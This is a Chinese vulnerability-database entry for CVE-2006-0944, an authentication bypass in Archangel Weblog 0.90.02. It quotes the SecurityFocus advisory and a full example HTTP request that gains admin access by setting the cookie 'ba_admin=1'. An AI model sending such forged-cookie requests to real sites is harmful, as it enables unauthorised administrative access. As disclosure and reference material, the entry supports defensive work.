Archangel Weblog认证绕过漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1109825 漏洞类型 访问验证错误
发布时间 2006-02-27 更新时间 2006-03-01
CVE编号 CVE-2006-0944 CNNVD-ID CNNVD-200602-424
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/27324
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200602-424
|漏洞详情
ArchangelWeblog0.90.02可使远程攻击者通过将ba_admincookie设置为1来绕过认证。
|漏洞EXP
source: http://www.securityfocus.com/bid/16848/info

Archangel Weblog is prone to an authentication-bypass vulnerability. This issue is due to a failure in the application to properly validate user-supplied data. 

An attacker can exploit this issue to bypass the authentication mechanism and gain access to the affected application as an administrative user. This may facilitate a compromise of the underlying system; other attacks are also possible.

The following example HTTP request is sufficient to exploit this issue:
GET http://www.example.com/awb/admin/index.php HTTP/1.1
Host: www.example.com
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12) Gecko/20051229 Firefox/1.0.7
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Cookie: ba_admin=1
Cache-Control: max-age=0
|参考资料

来源:BUGTRAQ
名称:20060226ArchangelWeblog0.90.02AdminAuthenticationBypass&RemoteFileInclusion
链接:http://www.securityfocus.com/archive/1/archive/1/426184/100/0/threaded
来源:XF
名称:archangel-admin-auth-bypass(24984)
链接:http://xforce.iss.net/xforce/xfdb/24984
来源:BID
名称:16848
链接:http://www.securityfocus.com/bid/16848
来源:OSVDB
名称:23620
链接:http://www.osvdb.org/23620
来源:MILW0RM
名称:3859
链接:http://www.milw0rm.com/exploits/3859
来源:SECTRACK
名称:1015689
链接:http://securitytracker.com/id?1015689